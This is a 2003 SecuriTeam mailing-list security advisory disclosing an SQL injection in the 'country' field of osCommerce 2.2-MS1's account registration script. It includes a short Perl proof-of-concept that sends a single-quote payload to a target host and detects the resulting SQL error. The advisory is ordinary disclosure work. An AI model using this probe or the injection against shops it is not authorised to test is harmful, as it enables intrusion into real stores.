[UNIX] osCommerce SQL Injection Vulnerability (create_account_process.php)

From: SecuriTeam (support_at_securiteam.com)
Date: 12/17/03

  • Next message: SecuriTeam: "[NEWS] J2EE Database Component Remote Code Execution" 
    To: list@securiteam.com
Date: 17 Dec 2003 17:03:05 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      osCommerce SQL Injection Vulnerability (create_account_process.php)
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.oscommerce.com> osCommerce is an online shop e-commerce
    solution under on going development by the open source community. Its
    feature packed out-of-the-box installation allows store owners to setup,
    run, and maintain their online stores with minimum effort and with
    absolutely no costs or license fees involved". An SQL injection
    vulnerability in the product allows remote attackers to gain elevated
    privileges.

    DETAILS

    Vulnerable Systems:
     * osCommerce version 2.2-MS1, possibly older versions.

    Immune Systems:
     * osCommerce version 2.2-MS2

    osCommerce is vulnerable to SQL Injection vulnerability in the
    create_account_process.php file. The attack can be carried out by a
    malicious user who is registering an account. All one has to do to exploit
    the vulnerability is save the registration form offline. After doing so an
    attacker can edit the "country" field to include malicious SQL code.

    Solution:
    Upgrade to the latest release available at:
    <http://www.oscommerce.com/downloads> http://www.oscommerce.com/downloads

    Exploit:
    #!/usr/bin/perl
    ####################################################################
    # osCommerce 2.2 MS1 Proof Of Concept - By JeiAr [ http://www.gulftech.org
    ]
    ####################################################################

    use LWP::UserAgent;

    ####################################################################
    # Use this script to test if your shop is vulnerable. Results are obvious
    :)
    ####################################################################

    $ua = new LWP::UserAgent;
    $ua->agent("Mozilla/4.0" . $ua->agent);

    if (!$ARGV[0]) {
      &usage;
    }
     
    $host=$ARGV[0];

    print "Trying $host ....\n";

    my $req = new HTTP::Request POST =>
    "http://$host/create_account_process.php";
       $req->content_type('application/x-www-form-urlencoded');
       $req->content("action=process&country=%27");
    my $res = $ua->request($req);
    $pattern = "You have an error in your SQL syntax";
    $_ = $res->content;

    print "\n" x 3;

    if (/$pattern/) {
    print "Host Is Vulnerable!\n";
    print "Download The Latest osCommerce ...\n";
    print "http://www.oscommerce.com/downloads\n";
    } else {
    print "Host NOT Vulnerable\n";
    }

    print "\n" x 3;

    exit;

    sub usage {

    print "osCommerce 2.2 MS1 Proof Of Concept - By JeiAr [
    http://www.gulftech.org ]\n";
    print
    "--------------------------------------------------------------------------\n";
    print "perl ossqlin.pl \"path to shop\" ex: ossqlin.pl
    www.mywebstore.com/catalog\n";

    exit;

    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:security at gulftech.org>
    JeiAr

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] J2EE Database Component Remote Code Execution"

    Relevant Pages